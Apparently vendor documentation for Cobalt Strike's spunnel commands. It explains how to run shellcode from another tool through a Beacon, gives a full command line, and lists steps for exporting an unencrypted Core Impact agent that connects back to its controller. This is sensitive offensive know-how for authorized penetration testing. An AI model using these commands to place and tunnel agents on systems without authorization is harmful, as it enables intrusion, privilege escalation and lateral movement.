Spawn and Tunnel

Use the spunnel command to spawn a third-party tool in a temporary process and create a reverse port forward for it. The syntax is spunnel [x86 or x64] [controller host] [controller port] [/path/to/agent.bin]. This command expects that the agent file is position-independent shellcode (usually the raw output from another offense platform). The spunnel_local command is the same as spunnel, except it initiates the controller connection from your Cobalt Strike client. The spunnel_local traffic is communicated through the connection your Cobalt Strike client has to its team server.

Agent Deployed: Interoperability with Core Impact

The spunnel commands were designed specifically to tunnel Core Impact's agent through Cobalt Strike's Beacon. Core Impact is a penetration testing tool and exploit framework also available for license from Fortra at https://www.coresecurity.com/products/core-impact

To export a raw agent file from Core Impact:

  1. Click the Modules tab in the Core Impact user interface

  2. Search for Package and Register Agent

  3. Double-click this module

  4. Change Platform to Windows

  5. Change Architecture to x86-64

  6. Change Binary Type to raw

  7. Click Target File and press ... to decide where to save the output.

  8. Go to Advanced

  9. Change Encrypt Code to false

  10. Go to Agent Connection

  11. Change Connection Method to Connect from Target

  12. Change Connect Back Hostname to 127.0.0.1

  13. Change Port to some value (e.g., 9000) and remember it.

  14. Press OK.

The above will generate a Core Impact agent as a raw file. You may use spunnel x64 or spunnel_local x64 to run this agent and tunnel it back to Core Impact.

We often use Cobalt Strike on an internet reachable infrastructure and Core Impact is often on a local Windows virtual machine. It's for this reason we have spunnel_local. We recommend that you run a Cobalt Strike client from the same Windows system that Core Impact is installed onto.

In this setup, you can run spunnel_local x64 127.0.0.1 9000 c:\path\to\agent.bin. Once the connection is made, you will hear the famous "Agent Deployed" wav file.

With an Impact agent on target, you have tools to escalate privileges, scan and information gather via many modules, launch remote exploits, and chain other Impact agents through your Beacon connection.

 

Related Topics